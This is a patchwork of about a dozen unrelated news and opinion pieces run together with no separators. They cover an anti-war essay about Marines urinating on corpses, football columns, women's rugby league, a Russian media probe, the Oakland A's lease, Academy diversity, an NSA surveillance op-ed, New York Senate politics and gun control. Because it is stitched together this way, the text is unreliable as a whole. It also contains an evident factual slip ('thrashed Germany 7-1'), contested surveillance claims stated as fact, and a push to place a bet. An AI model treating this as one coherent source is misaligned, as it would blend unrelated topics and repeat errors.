A video emerges showing US Marines pissing on three Taliban corpses in Afghanistan . The outrage machine grinds into motion . The media bestirs itself from its slumber . Americans momentarily pay attention to the war in Afghanistan again . Politicians rush to add their names to the chorus of identical statements . All inflamed over the least bad thing that soldiers do in war .
Do you know what is worse than having your dead body urinated upon ? Being killed . Being shot . Being bombed . Having your limbs blown off . Having your house incinerated by a drone-fired missile that you do n't see until it explodes . Having your children blown up in their beds . Having your spouse killed . Having your hometown destroyed . Being displaced . Becoming a refugee . Having your entire life destroyed as a consequence of political forces far , far beyond your control .
War is horrible . War is sickening . Wars started for supremely righteous causes are just as horrible and sickening in their consequences as wars started for less than righteous causes . Politicians who sit in office chairs and start wars and wave flags as young men and women go off to kill and die and be psychologically and emotionally damaged for life are the most sickening of all . Politicians start wars and are rewarded with an appearance on weekend talk shows and Very Respectable Discussions with Very Respectable media figures and jokes at the White House Correspondent 's Dinner and appearances on Leno and ghostwritten self-glorifying memoirs and lavishly catered fundraising parties with corporate executives . They should be rewarded with outrage . They should be rewarded with scorn . Starting a war is a monstrous , monstrous crime against humanity , as we know when it begins that no matter how cleanly it is conducted it will result in thousands upon thousands of bullets smashing men 's skulls and arms and legs blown off by shrapnel and mothers and children incinerated by high explosives . And every extra day that a war is perpetuated unnecessarily is a crime anew .
And we as a nation could not be more bored by the unceasing industrial strength violence being carried out in our names in nations where none of us will travel , or vacation , or think about much at all as long as sports and American Idol and Downton Abbey are on TV . We skim past those stories of the latest bombing or drone strike or gunfight or civilian massacre . We joke about the personal foibles or funny accents or minor gaffes of the politicians who hold it in their power to stop war , but wo n't . We 're bored and petulant and self-absorbed until that video of some soldier pissing on dead bodies comes along , at which point we can have an outrage contest and feel good about ourselves for being more outraged than the next completely uninvolved person , for a day or two , until the big game comes on .
Here 's what else happened in Afghanistan this week : `` The Department of Defense announced today the deaths of four Soldiers who were supporting Operation Enduring Freedom . They died Jan. 6 in Kandahar province , Afghanistan , of wounds suffered when enemy forces attacked their vehicle with an improvised explosive device . Killed were : Staff Sgt . Jonathan M. Metzger , 32 , of Indianapolis , Ind . ; Spc . Robert J. Tauteris Jr. , 44 , of Hamlet , Ind . ; Spc . Christopher A. Patterson , 20 , of Aurora , Ill. ; Spc . Brian J. Leonhardt , 21 , of Merrillville , Ind . ''
`` The Department of Defense announced today the death of a soldier who was supporting Operation Enduring Freedom . Pfc . Michael W. Pyron , 30 , of Hopewell , Va. , died Jan. 10 in Parwan province , Afghanistan . He was assigned to the 25th Signal Battalion , 160th Signal Brigade , 335th Signal Command Theater , East Point , Ga . ''
`` The Department of Defense announced today the death of a soldier who was supporting Operation Enduring Freedom . Pfc . Dustin P. Napier , 20 , of London , Ky. , died Jan. 8 in Zabul province , Afghanistan , of injuries sustained from enemy small-arms fire . He was assigned to the 1st Battalion , 24th Infantry Regiment , 1st Stryker Brigade Combat Team , 25th Infantry Division , Fort Wainwright , Alaska . ''
`` The Department of Defense announced today the deaths of three airmen who were supporting Operation Enduring Freedom . They died Jan. 5 in Shir ghazi , Helmand province , Afghanistan , when their vehicle was struck by an improvised explosive device . Killed were : Senior Airman Bryan R. Bell , 23 , of Erie , Pa . He was assigned to the 2nd Civil Engineer Squadron , Barksdale Air Force Base , La . ; Tech . Sgt . Matthew S. Schwartz , 34 , of Traverse City , Mich . He was assigned to the 90th Civil Engineer Squadron , FE Warren Air Force Base , Wyo . ; Airman 1st Class Matthew R. Seidler , 24 , of Westminster , Md . He was assigned to the 21st Civil Engineer Squadron , Peterson Air Force Base , Colo . ''
And all of the dead bodies on the other side . We just do n't have the names .
Piss on that .
1 of 8 View Captions
Kim Raff | The Salt Lake Tribune A worker walks past a spire that will be used on the construction of the Provo City Center Tem Steve Griffin | The Salt Lake Tribune Construction crews work to attach the Angel Moroni statue after a crane lifted it to the Steve Griffin | Tribune file photo Construction crews work to attach the Angel Moroni statue after a crane lifted it to the top Scott Sommerdorf | The Salt Lake Tribune An artist 's rendering of the new Temple sits beside the part of the Taber Scott Sommerdorf | The Salt Lake Tribune Elder Jeffrey R. Holland of the Twelve arrives to conduct the dedication Steve Griffin | The Salt Lake Tribune Construction crews work to attach the Angel Moroni statue after a crane lifted it to the Kim Raff | The Salt Lake Tribune Construction workers lay the foundation under the Provo City Center Temple at the construction Kim Raff | The Salt Lake Tribune Construction workers lay the foundation under the Provo City Center Temple at the construction
Stoke City striker Peter Crouch writes a weekly column exclusively for Sportsmail
The first thing to say is I 'd have done exactly the same if I 'd been wearing blue .
It has been claimed Manchester City 's players crossed a line at Old Trafford but nothing could be further from the truth .
Why would n't you celebrate a big win away from home ? In the heat of the moment , at the end of a match when there is something huge riding on the outcome , the only people you think about is yourself and all the people on your team who have helped you .
If the team in the opposite dressing room does n't like it , that 's their problem . The way City 's squad reacted was totally natural . I saw the game as a title decider and the manner in which they put United away means they effectively are n't for catching .
It has been claimed Manchester City 's players celebrated excessively last Sunday
Why would n't their players celebrate a big victory away from home against their big rivals
So I could fully appreciate the stories that emerged of music blaring , screaming and shouting in the away dressing room . I had an experience seven years ago that I could relate to — one , ironically , in which the team on the receiving end was Man City .
At the Etihad Stadium on May 5 , 2010 , I scored the goal that put Tottenham back into Europe 's top club competition for the first time since 1961 . It was the penultimate game of the season and the battle to finish fourth had boiled down to a shootout between ourselves and City .
The feeling was amazing and the celebrations were incredible . We headed over to our fans at the end , singing and dancing . When we got back into the dressing room , there were bottles of champagne waiting for us .
I scored the goal that put Tottenham back into the Champions League at the Etihad Stadium
The celebrations after the game - including bottles of champagne - were incredible
I 'll never forget that because each one said 'Welcome to the Champions League ' . Sky had broadcast the match and they had the bottles prepared in readiness for the winners . You can imagine in our little sanctuary how much they were getting shaken up and fizzed around . The noise , the music was amazing .
We did n't care where we were , we just wanted to release our feelings . Though the make-up of the tunnel area is different to Old Trafford — the away team turns left , the home team goes right — the City lads could n't have failed to hear us ... but they let us carry on without saying a word .
The second thing to say is I would have been equally angry had I been wearing red . Some people believe the reaction of United 's players was excessive but I understand why they reacted as they did . I 've been in their position , sitting in a dressing room when barely a word is being spoken and all you can hear is the thudding of a stereo and the screaming of a squad who have taken what you want more than anything . It churns away inside and winds you up .
Defeats like Manchester United 's loss against City churn away inside and wind you up
When I think back to the 2007 Champions League final in Athens , all that comes into my mind is the laughter of the AC Milan players filtering through the walls . It was awful . It 's part and parcel of football but it never gets easier when someone rubs it in your face .
There was a big thing when Liverpool played West Ham in the 2006 FA Cup final . We saw the West Ham celebrations at the semi-final when they beat Middlesbrough ; the players had this little dance they kept doing and we were adamant there was no way they were going to dance in front of us .
The idea of them celebrating with 'our ' trophy was never going to be tolerated and that provided some inspiration for our comeback in the second half , when we drew 3-3 before winning on penalties .
Critics are saying United are bad losers but we all are . Am I a bad loser ? Absolutely . I do n't think you can play in the Premier League or participate in elite sport if you do n't mind losing .
The 2007 Champions League final just brings memories of AC Milan 's players laughing
You will lose at some point . It is part of the game . It comes home with you when you lose . I do n't tend to sleep after games , but it 's worse if we 've lost . The next day it preys on my mind , I 'm always thinking about what I could have done differently .
Jose Mourinho would have been so wound up because it was three huge points before Christmas and you mix that all together , you end up with the kind of commotion that erupted at Old Trafford , which is probably the only stadium in the country where something like that could happen and not be filmed . Both teams turn left from the main tunnel to go into this tight little corridor , with the United players having to pass the away dressing room . The space is tight but there are no cameras and that probably explains why it goes off there more than anywhere else !
Most of the time it is handbags , pushing and shoving . You do n't see many digs being thrown because everyone is holding everyone , but such flashpoints are always going to happen . They have been going on since football began and I 've lost count of how many I 've seen during my career .
In some ways , is n't this what supporters want to see from their players ? When it comes down to it , we can explain in one word why this happened : passion . Fans want to see the players are hurting . If everyone was smiling , laughing and joking , it would n't go down well . This showed everyone cared . You can call United bad losers but there is nothing wrong with that . Bad losers make the best winners .
Jose Mourinho would have been wound up because it was three huge points to lose in the race
It may sound strange to say but it feels like David Silva has gone up another gear . Just watching him against Manchester United — he was putting his foot in , tackling . He was everywhere , a side to his game that we had never seen before .
When we played Manchester City , him and Kevin De Bruyne ran the most anyone in their side . Years ago , talents like that were called luxury players and other people did the running for them . This is modern football : you ca n't carry anyone if you want to win . Credit to Pep Guardiola for adding this dimension to their performances . He has got them to a level now where they run themselves into the ground every match .
I 've always admired Silva but this season he 's been top notch .
He has never been the PFA Player of the Year , but he is going to get closer to that award than ever before . He and De Bruyne have easily been the standout players , ahead of Eden Hazard and Mohamed Salah , who are up there too .
It seems as though City midfielder David Silva has managed to go up another gear this season
Steven N'Zonzi could be the bargain buy of January sales
The January window will soon be open and one name I 've seen persistently linked with a move to the Premier League in recent days is Steven Nzonzi .
I have no idea where he will end up —Arsenal and Everton are the clubs getting the biggest mentions — but one thing I do know for certain is he will be a quality addition wherever he goes , as he is tailor-made for our game .
Steven was my team-mate at Stoke for three years . When he left for Seville in 2015 , I was shocked that Arsenal or Liverpool did n't enter the bidding for him as I felt he would have been ideal for both those clubs , particularly Arsenal . He looked like he could be a replacement for Patrick Vieira .
I genuinely think he 's got it in him to become that good .
My old team-mate Steven N'Zonzi would be a top addition for any club in the Premier League
You ca n't really compare him to Vieira because he was something else but Steven has got similar attributes , being so good on the ball and energetic , but so strong , powerful and good in the air . I sometimes think players who are doing well for Stoke get overlooked and that may have been the case for Steven
His situation reminded me of Lassana Diarra , who I played with at Portsmouth . He had been at Chelsea and Arsenal , but barely played .
After training with him a few times , I could n't work out why .
He ended up going to Real Madrid for £18million , but we were so lucky to have him at Fratton Park .
N'Zonzi can have stroppy moments but he 's a good lad and was overlooked at Stoke
'Lass ' was quality and that is the word that I would use without hesitation to describe Steven , who has been excellent for Seville and won the Europa League with them in 2016 .
If he does return to England next month , he wo n't have any trouble settling as he knows the league inside out after his spells with us and , before that , Blackburn . He can have some stroppy moments when things are n't going well , but he 's a good lad .
Any club that takes a punt on him will be getting a good one .
England wo n't go far wrong if Jack Butland is No 1 in Russia
It has been hard going for Jack Butland this past week . We were all gutted to lose at the death against Burnley on Tuesday night , but Jack was particularly frustrated , as he deserved a clean sheet .
He has been our standout performer and the form Jack has been showing has made my mind even clearer that there will be a point in the near future when he becomes England 's No 1 . He is world class and has everything a keeper needs , from his size to his athleticism , while he is also good with his feet .
The focus is on him a little more now , given the difficult time Joe Hart is experiencing at West Ham , but I do n't think Joe losing his place will have changed Jack 's attitude with regards to starting England 's next friendly in March . There certainly wo n't be any complacency . Jack is very focused and is the kind of character who takes everything in his stride .
Jack Butland is world class and has everything that a goalkeeper needs to succeed
He has never made any secret about wanting to take over the gloves from Joe in the future and if that was to happen in Russia next summer , we would n't go far wrong .
If he can stay fit for the rest of the season , he will be right in England manager Gareth Southgate 's thoughts , although I ca n't talk about Jack without mentioning Stoke 's other goalkeeper , Lee Grant .
He 's so unlucky .
Whenever Lee comes in , he always does well . He would be a good No 1 for anyone in the Premier League .
Women 's rugby league the fastest growing sport in Queensland , empowers outback women
Posted
This weekend more than 60 Mount Isa women lined up to play rugby league in North Queensland 's first all-female exhibition match .
And , as the fastest growing sport in Queensland , the locals were not surprised .
Queensland Rugby League said female participation in the sport increased 30 per cent in 2016 with over 11,000 women and girls playing the game in the state .
It gives them an opportunity to get out there , showcase their skills and ability in the game to show them that there is a pathway in rugby league for them to go forward and pursue a career in it . Nelson Dotoi , NRL development officer
Aside from winning the clash against the Normanton and Doomadgee combined team , the Mount Isa team has high hopes for the sport 's future .
Player Isaiah Retchford , who comes from a family of NRL players , said she was thrilled to be able to finally don a jersey in a team of her own .
`` I got interested in the sport because of my father — he played for the Newcastle Knights , '' Ms Retchford said .
`` My sister represented Marlins in Queensland , and so did my brother , so it 's pretty much in my family .
`` I remember playing when I was young down here , and girls were n't allowed to play because it was a bit rough , but it did n't faze us . ''
Women 's NRL has growing interest
NRL development officer Nelson Dotoi , who has been promoting the code in schools across the state 's north-west , said he was happily surprised by the burgeoning support .
`` At the moment we have a team here in Mount Isa , and [ with ] the number of girls that we have , we could divide it into two teams , '' Mr Dotoi said .
Gone are the days where women belonged in the canteen and washing the jerseys . Renae Kunst , Jillaroos player
`` It 's a big thing , not only for the town of Mount Isa but for the girls .
`` It gives them an opportunity to get out there , showcase their skills and ability in the game to show them that there is a pathway in rugby league for them to go forward and pursue a career in it . ''
Renae Kunst , a professional player with the national women 's rugby league team , the Jillaroos , travelled to Mount Isa for the game .
She wanted to scout talent and mentor players and said she had high hopes for women 's rugby league .
`` The women 's game does n't lack the talent [ or ] the determination , '' she said .
`` It 's only been since 2013 that Australian women 's rugby league has come under the NRL banner , and from then we 've seen the game go from strength to strength , so it 's exciting times . ''
Prejudice still exists say players
Despite official acceptance , Ms Kunst said she was still exposed to prejudice around female participation .
`` It 's certainly out there , it 's certainly around . Women 's rugby league was always seen as a bit of an exhibition , a bit of a giggle , dare I say , '' Ms Kunst said .
But Ms Kunst said as exposure with the national and state teams continues to grow , the prejudice has decreased .
`` We 're getting these girls when they 're younger , and the under-14s and under-16s play at a carnival with the boys , so people are seeing this exposure and their opinions are changing , '' she said .
`` Gone are the days where women belonged in the canteen and washing the jerseys . ''
And while Ms Kunst is thrilled to play rugby league at a national level , she said starting women 's teams in towns like Mount Isa was about more than the sport itself .
`` It 's the girls and the women that you 're empowering , not only to play our sport , but just to be active and just to belong to something — it 's something that I 'm grateful to be a part of , '' she said .
Mr Dotoi said while rugby league remained a male-dominated sport , the code was aiming for women 's teams to grow just as popular .
`` We 'd like to push the women 's rugby league , and hopefully each club within an area has their own girls ' rugby league , right up to their ladies rugby league , '' he said .
Topics : rugby-league , women , sports-organisations , regional , sport , mount-isa-4825
The lower house of the Russian parliament has ordered a probe into whether RFE/RL 's Russian Service , Voice of America , and CNN are in compliance with Russian laws .
The move by the State Duma on March 17 comes just days after Democratic U.S . Senator Jeanne Shaheen introduced a bill that would empower the U.S. Justice Department to investigate possible violations of the Foreign Agents Registration Act by RT , the state-backed Russian TV channel .
The Russian initiative was introduced by Konstantin Zatulin , a member of President Vladimir Putin 's United Russia party , which holds an overwhelming majority in the Duma .
Approved by lawmakers on March 17 , the move instructs the Duma 's committee on information policy to probe compliance with Russian laws by VOA , CNN , and RFE/RL 's Russian Service , known locally as Radio Svoboda .
Zatulin specifically linked the probe to Shaheen 's bill , which cited an assessment by U.S. intelligence that RT was used as part of a Kremlin-directed hacking and public-influence campaign aimed at helping President Donald Trump defeat his Democratic rival , Hillary Clinton , in last year 's presidential election .
RT and the Kremlin reject the accusation . RT is funded by the Russian government , but argues it is editorially independent from the Kremlin .
Both RFE/RL and VOA are overseen by the Broadcasting Board of Governors ( BBG ) , a U.S. agency that supervises international civilian government broadcasting and media operations .
VOA is a federal entity , while RFE/RL is a private , nonprofit organization funded by a grant from the U.S. Congress .
CNN has also come under fire from Moscow over its coverage of alleged Russian meddling in the presidential election and purported ties between associates of Trump and Russian officials .
Russian Foreign Ministry spokeswoman Maria Zakharova earlier this month accused the Atlanta-based international news network , which Trump has repeatedly criticized as well , of spreading “ false news . ”
Shaheen told RFE/RL that it appeared her legislation had struck a nerve with the Kremlin and some Duma members .
“ My bill is straightforward : RT News has made public statements boasting that it can dodge our laws with shell corporations , and this legislation gives the Department of Justice the authority it needs to fully investigate , ” Shaheen said in a statement .
The Foreign Agents Registration Act is a decades-old law that requires anyone working in the United States on behalf of a foreign government , “ in a political or quasi-political capacity , '' to register with the Justice Department .
OAKLAND , Calif. -- The Oakland Athletics , after reportedly receiving permission from commissioner Bud Selig to move from the Coliseum , have finalized an agreement on a 10-year extension to stay there through the 2024 season .
The deal was approved Thursday by the Oakland-Alameda County Coliseum Authority . The deal still needs to be formally approved by the Oakland City Council and Alameda County Board of Supervisors later this month .
Commissioner Bud Selig had reportedly given the A 's permission to leave Oakland prior to a new 10-year lease extension being finalized Thursday . Ezra Shaw/Getty Images
The deal settles all outstanding issues between the two sides , including a dispute of past rent owed by the A 's . The 's will spend more than $ 10 million on a new scoreboard and the Coliseum Authority will pay for any structural improvements that will be in place by Opening Day 2015 .
According to the San Francisco Chronicle , Athletics owner Lew Wolff told city and county officials via email on Wednesday night that he had received permission from Selig to immediately `` seek a temporary or permanent location outside the city of Oakland '' unless a new stadium deal was agreed upon .
The Oakland-Alameda County Coliseum Authority restarted negotiations Thursday morning , according to the Chronicle . A planned vote on a 10-year lease was delayed on June 27 after four of the eight City of Oakland representatives did not show up for the meeting .
Oakland Mayor Jean Quan and City Council president Pat Kernighan said the vote in late June was delayed because city officials felt they needed more time to negotiate terms that would keep the team in Oakland and protect residents ' interests .
The O.co Coliseum , which was built in 1966 and has been home to the Athletics since 1968 , has had multiple sewage problems in the past year and an outage affecting the outfield lights on June 14 .
Information from The Associated Press was used in this report .
With eight teams remaining at Euro 2016 and seven matches left to determine who will be the champions of Europe , bookmakers appear to be underestimating Germany .
Hosts France remains the favourites despite looking fairly average throughout the tournament , whilst Spain , who were second favourites after their 3-0 thrashing of Turkey , were eliminated in the second round .
Germany is the world champions and have a large number of the team that thrashed Germany 7-1 and beat Argentina in the final , at Euro 2016 .
With that in mind , here are my five reasons why I believe Joachim Löw 's side will win the European Championships for a record fourth time :
1 . Best Attack
Germany had the best attack on paper coming into the tournament and they 've gone on to bombared their opponents ' goal in their first four games in France . Statistically they have had more efforts on goal than any other nation at Euro 2016 .
Löw is blessed with an exceptional amount of creative talent in his suqad – Mesut Özil , Toni Kroos , Thomas Müller and Julian Draxler all in the starting lineup alone . Add to that full-backs Joshua Kimmich and Jonas Hector offering good support down the wings . The German coach also has Mario Götze , Leroy Sané , Bastian Schweinsteiger and André Schürrle to call upon from his bench too .
These names and their performances so far make it virtually impossible for defences to protect their goalkeeper for long periods of the game . So far it is only some poor finishing from Mario Gómez and Thomas Müller that hav prevented Germany 's margin of victory being much greater than the 1-0 scoreline versus Northern Ireland and 3-0 victory over Slovakia .
Germany did have issues up front in their first two games – versus Northern Ireland and their 0-0 draw with Poland when Götze was the ‘ false number 9 ' . These issues now look fixed with the recall of Mario Gómez , scoring two goals in his two starts and teaming up with Müller better than what has actually been reported by journalists .
2 . Protected Goalkeeper
Germany have gone all 360 minutes without conceding a single goal at Euro 2016 so far and have barely looked like conceding one either . Jérôme Boateng made a goalline clearance versus Ukraine and Manuel Neuer saved a close range header from Slovakia but that 's about all . You have to go back to the 2014 World Cup semi-final versus Brazil to see when they last conceded – Oscar 's consolation in the 1-7 humiliation .
Jérôme Boateng and Mats Hummels have been a solid partnership since Bayern Munich 's new signing returned from injury after the first game . Die Mannschaft have allowed fewer efforts on their goal than any of the quarter-finalists . Juventus ' Sami Khedira and Real Madrid 's Toni Kroos doing a good job in protecting the back four .
Even if latter stage opponents are to create opportunities , Germany have arguably the best goalkeeper in the world in Neuer to get past .
3 . Player of the Tournament
Toni Kroos has been the best player of the tournament so far . He has run the German midfield that has spent the majority of their games in opposition territory and averaged the most possession . Kroos is laying the ball off to the likes of Özil , Müller and Draxler to create chances in and around the penalty area .
The Real Madrid midfielder has been very accurate with his passing and also delivers a good set piece . Ahead of Germany 's highly-anticipated quarter-final match versus Italy – Kroos has the potential to really hurt Antonio Conte 's side . Tire them out in midfield as they chase the ball and open up their weakened midfield .
There are doubts over the fitness of Italy 's 32-year-old Daniele De Rossi starting opposite Kroos after limping off early in the second half in their win over Spain on Monday . Even if fit , the Roma midfielder has n't completed 90 minutes once this summer . Thiago Motta , who has replaced De Rossi in his three starts , is suspended . Marco Verratti is n't in the squad due to injury . Italy 's defence and midfield have good reason to be fearful on Saturday .
4 . Little Competition
Germany are years ahead of the competition in terms of talent and development . This has been the case for a couple of years now – going back to when I tipped them to win the 2014 World Cup . I have tipped and backed them to win Euro 2016 also and I 'm more confident than ever .
Why ? There 's virtually no competition to stop them . Spain are eliminated after not looking as good as they were 4-6 years ago , Croatia bottled it versus Portugal having looked good in their group , England were never serious contenders and France are looking mediocre .
Italy headed into Euro 2016 with journalists back home claiming this was their weakest squad ever – despite being eliminated from the group stage in Brazil two years ago ! Sure , they have a great manager and a great defence but they have nothing to off the Germans . Do n't be surprised if Germany tear open that back three in a similar fashion to Barcelona in the UEFA Champions League final 13 months ago ( granted , Giorgio Chiellini did n't feature ) . And Graziano Pellè and Éder to hurt Germany 's defence ? Good one .
Two years ' time in Russia I already have Germany down as clear favourites as well .
France are producing some good talent but they 're a long way short of Germany right now . This summer they have been unlucky with injuries at centre-back – Raphaël Varane , Aymeric Laporte and Kurt Zouma all missed the tournament and all would have started ahead of Adil Rami . I can not see the Seville defender , along with Laurent Koscielny , holding out the German attack should they meet in the semi-final . Didier Deschamps ' side have also been heavily reliant on Dimitri Payet and Antoine Griezmann in attack . Simply not enough . They need to develop a lot of talent if they 're to win the 2018 World Cup – two new full-backs and another playmaker at least , as well as some depth . At least Karim Benzema should be available by then…
Spain are producing some good young talent too but right now they do n't look on par with the talent they had between 2008-12 , winning all three major tournaments . Who 's the next Andrés Iniesta ? Have they replaced Xavi ? Who 's going to replace Sergio Ramos ? Who 's going to lead the line up front ? Again , they are far short on Germany 's level right now .
Argentina is the last hopeful in Russia . Yet they seem to be in a bit of turmoil following their 2016 Copa América final defeat to Chile last week . Lionel Messi has retired and other stars are reporting to be considering their futures too with the national team . Three final defeats in 24 months – there 's something about Argentina and failure .
5 . Winners Time and Time Again
If there 's one thing you can associate with the German national team more than anything else , it 's winning Four times World Champions and three time winners of the European Championships .
Only Brazil have more World Cups and quite frankly , I think Germany will be the first nation to win the trophy for a sixth time at this rate .
It 's in their blood to win and whilst it might sound a bit cliché I can back it up by saying that their squad consists of many Bayern Munich players who have a winning mentality in their blood . A couple have played for Real Madrid in recent seasons too whilst Mesut Özil has won the FA Cup with Arsenal .
Forget about their performances in qualifying and friendlies – Germany always raise their game in tournaments and I firmly believe they are the clear favourites to win Euro 2016 . Do n't believe me ? Let 's see what they do to Italy on Saturday night…
Germany are 4.1 to win Euro 2016 with Betfair – these odds will shrink after they beat Italy so jump on them now .
Dawn Hudson ( front row , in blue ) and Cheryl Boone Isaacs ( second person to Hudson 's right ) pose with Academy members of Asian descent at the Sept. 25 gathering .
The Academy 's president and CEO attended a Sept. 25 gathering that was hosted and attended by many of the organization 's estimated 250 Asian members .
In an effort to repair the relationship between the leadership of the Academy of Motion Picture Arts and Sciences and its members of Asian descent , Academy president Cheryl Boone Isaacs and CEO Dawn Hudson attended and spoke at a Sept. 25 reception welcoming some 80 new Asians into the organization .
Relations became strained earlier this year when February 's Oscars featured tasteless jokes about Asians , prompting 25 Asian members , including Ang Lee and George Takei , to send a letter of condemnation to the Academy , which then issued an apology and met with 15 members of Asian descent to hear their concerns .
The unprecedented September gathering , which took place at The London West Hollywood , was organized by a `` host committee '' comprised of incumbent Asian members : actors Peter Kwong and Jodi Long , director Chris Tashima , documentarians Arthur Dong and Freida Lee Mock ( both former members of the board of governors ) , producers Janet Yang and Teddy Zee and publicists Laura Kim and David Magdael .
There are an estimated 250 Asians in the Academy ( since the Academy does not publish a membership list , the exact number is difficult to assess ) , and all those known to the host committee were invited . Among those who attended : Grey 's Anatomy star Sandra Oh , as well as current cinematographers branch governor Daryn Okada , past sound branch governor Don Hall , France Nuyen , James Hong , Jessica Sanders , Lisa Lu , Michael Goi , Mynette Louie , Renee Tajima Pena , Rita Hsaio , Peter Kwong , Irene Tsu , Ramona Diaz , Elizabeth Sung and Clyde Kusatsu .
Dong , a 1984 Oscar nominee for the documentary short Sewing Women and an Academy member since 1997 , tells The Hollywood Reporter , `` After a frank meeting with AMPAS CEO Dawn Hudson and president Cheryl Boone Issacs to discuss action steps [ in response to the Oscars controversy ] , a group of us wanted to keep the momentum going . '' He adds , `` As Academy members , we 've participated within our various branches as professionals in our respective fields ; we 've never organized under a racially based umbrella before . But having witnessed the tone-deaf jabs at Asians during the Oscars , compounded with the very recent , but century-long practice of whitewashing , yellow-face casting decisions by major film productions , we felt a need to come together over this integral part of our identities . ''
In response to widespread outrage over the absence of any acting nominees of color over the past two years , as well as the offensive jokes about Asians , the Academy created three new seats on its board for `` diversity governors '' who , unlike the others , would be appointed , not elected , and represent the interests of diversity in all meetings . One of the charter appointees is Asian-American director Jennifer Yuh Nelson ( Kung Fu Panda ) .
Late last week , President Donald Trump told CBS News that domestic surveillance of American citizens should the “ No . 1 ” topic of inquiry until we can find out “ what the hell is going on ” with it . Also late last week , the National Security Agency — the federal government 's 60,000-person-strong domestic spying agency — announced that it would voluntarily hold back on its more aggressive uses of Section 702 of the Foreign Intelligence Surveillance Act .
That section permits the NSA to capture communications between foreigners and Americans without a warrant from any court , even though the NSA has its own secret court that has granted well over 99 percent of applications for spying brought to it .
Yet the NSA has convinced the Foreign Intelligence Surveillance Court that when it captures the communications of a foreigner and an American and those communications refer to a third person who is an American , Section 702 extends the authority for warrantless spying to that third person , as well . And it extends to any person whom the third person is talking about — and so forth , out to the sixth level of communication .
If you do the math , this NSA-concocted , Section 702-generated , secret FISA court-approved logic permits warrantless spying on nearly everyone in the United States . So why did the NSA announce that it will pull back on the way it utilizes Section 702 as the basis for its mass spying ? The Constitution in Ex ... Andrew P. Napolitano Best Price : $ 3.00 Buy New $ 5.00 ( as of 10:50 EST - Details )
Here is the backstory .
FISA was written in the aftermath of the Watergate scandal , which involved illegal domestic spying . The purpose of FISA was to insert the judiciary between the NSA and its targets so as to ensure that there would be a consistent legal basis for the spying . What was that basis ?
The Supreme Court has long characterized domestic spying as surveillance , and it has characterized surveillance as either a “ search ” or a “ seizure ” of communications . The Fourth Amendment requires judicially issued warrants for all government searches and seizures , and it mandates that those search warrants be based on probable cause of wrongdoing on the part of the person whom the government wishes to surveil and that the warrants themselves specifically describe the place to be searched or the person or thing to be seized .
Yet government lawyers , who have no opposition standing next to them when they appear in the FISA court , have convinced the court that the constitutional requirement of probable cause only applies to the government when it is engaging in law enforcement , not when it seeks intelligence data . So when the NSA asks the FISA court for authority to conduct surveillance , the FISA court complies , and it does so with warrants that do not specifically describe the place to be searched or the person or thing to be seized . These warrants typically authorize spying by ZIP codes or area codes or street addresses or telecommunications companies ' customer lists .
Suicide Pact : The Radi ... Andrew P. Napolitano Best Price : $ 1.19 Buy New $ 3.50 ( as of 07:30 EST - Details ) What the NSA does not tell the FISA court is that its requests for approvals are a sham . That 's because the NSA relies on vague language in a 35-year-old executive order , known as EO 12333 , as authority to conduct mass surveillance . That 's surveillance of everyone — and it does capture the content of every telephone conversation , as well as every keystroke on every computer and all fiber-optic data generated everywhere within , coming to and going from the United States .
This is not only profoundly unlawful but also profoundly deceptive . It is unlawful because it violates the Fourth Amendment . It is deceptive because Congress and the courts and the American people , perhaps even the president , think that the FISA court has been serving as a buffer for the voracious appetite of the NSA . In reality , the NSA , while dispatching lawyers to make sophisticated arguments to the FISA court , has gone behind the court 's back by spying on everyone all the time .
In a memo from a now-former NSA director to his agents and vendors , leaked to the public , he advised capturing all data from everyone all the time . This produces information overload , as there is more data than can be analyzed ; each year , it produces the equivalent of 27 times the contents of the Library of Congress . Therefore , safety — as well as liberty — is compromised .
The recent mass killings in Boston , San Bernardino and Orlando were all preceded by text messages and cellphone conversations between the killers and their confederates . The NSA had the digital versions of those texts and conversations , but it had not analyzed them until after the killings — because it has and has had too much data to analyze in a critical and timely manner .
The Freedom Answer Boo ... Andrew P. Napolitano Best Price : $ 1.01 Buy New $ 3.47 ( as of 09:10 EST - Details ) So , why did the NSA announce that it is pulling back from its customary uses of Section 702 ? To give the false impression to members of Congress that it follows the law . Section 702 , the great subterfuge , expires at the end of this year , and the NSA , which has spied on Donald Trump since before he was president , fears the debate that will accompany the efforts to renew it — hence its softening public tone .
The genius of the Fourth Amendment is that it serves as a two-edged sword . By requiring probable cause before judges can issue warrants to agents for surveillance , the amendment both protects the privacy of those uninvolved in wrongdoing by leaving them alone and compels federal agents to focus their appetite for intelligence and their need for evidence on only those they legitimately feel may have done wrong .
In the meantime , Trump knows that he has been the victim of overzealous and unlawful surveillance , and we can expect during the debate over renewal of Section 702 that he will have a more sober and constitutional view of all this than his predecessors have ; and that may bring about more freedom and more safety .
Reprinted with the author 's permission .
The Best of Andrew P. Napolitano
The group formed by Vermont Sen. Bernie Sanders in the aftermath of the presidential election is joining the pressure campaign aimed at pushing the Independent Democratic Conference back into the mainline Democratic fold in the state Senate .
“ If we are going to truly build a country that works for all people , progressive states like New York should be leading the way , ” said Our Revolution Executive Director Shannon Jackson .
“ That wo n't happen as long as progressives are divided . Our Revolution calls on progressive legislators in the New York state senate to unite in a majority so that New York can pass Medicare for All and protect immigrant communities from Trump 's xenophobic agenda . New York legislators must show the entire country what a progressive vision for our looks like . ”
Support from the Sanders-backed group comes as a variety of entities and figures are pushing for united Democrats in the Senate as the party holds a numeric majority of 32 , but the chamber is controlled by the Republican conference .
Republicans retain the majority with the help of Sen. Simcha Felder , an enrolled Democrat who conferences with the GOP , but he has urged IDC Leader Jeff Klein to rejoin the Democratic fold .
Klein has countered by calling for votes on a variety of key , hot-button issues that are supported by the Democratic base , but not have the needed support in the sharply divided chamber , such as strengthening abortion rights and access to tuition assistance for undocumented immigrants .
Still , the Working Families Party is conducting a revamped digital campaign on Facebook pushing the IDC , while support as also come for unity from the 18 Democrats members of the House delegation in New York .
Last week , I wrote about President Barack Obama 's gun-control executive orders , and in it , I said , `` You do n't have to be a firearms enthusiast to know that this is n't a final triumph for gun-control advocates . It 's only the latest chapter . ''
My argument was that any time you give the government an inch , they will always take a mile — especially when it comes to eroding our constitutional liberties . I also argued that our Bill of Rights was designed to make sure government did n't even get an inch and that certain rights `` shall not be infringed . ''
The day after the column ran online , Dianne Feinstein introduced a revamped assault-weapons ban that included some types of handguns and shotguns . And with it , the definition of what is or is n't an assault weapon had expanded and that definition is likely to keep expanding . In fact , the point is to keep expanding them .
Government grows . It expands . Always . And Second Amendment advocates are right to fear a compromise on the right to bear arms . The politicians will keep coming for their guns . This is not paranoia . It is probable .
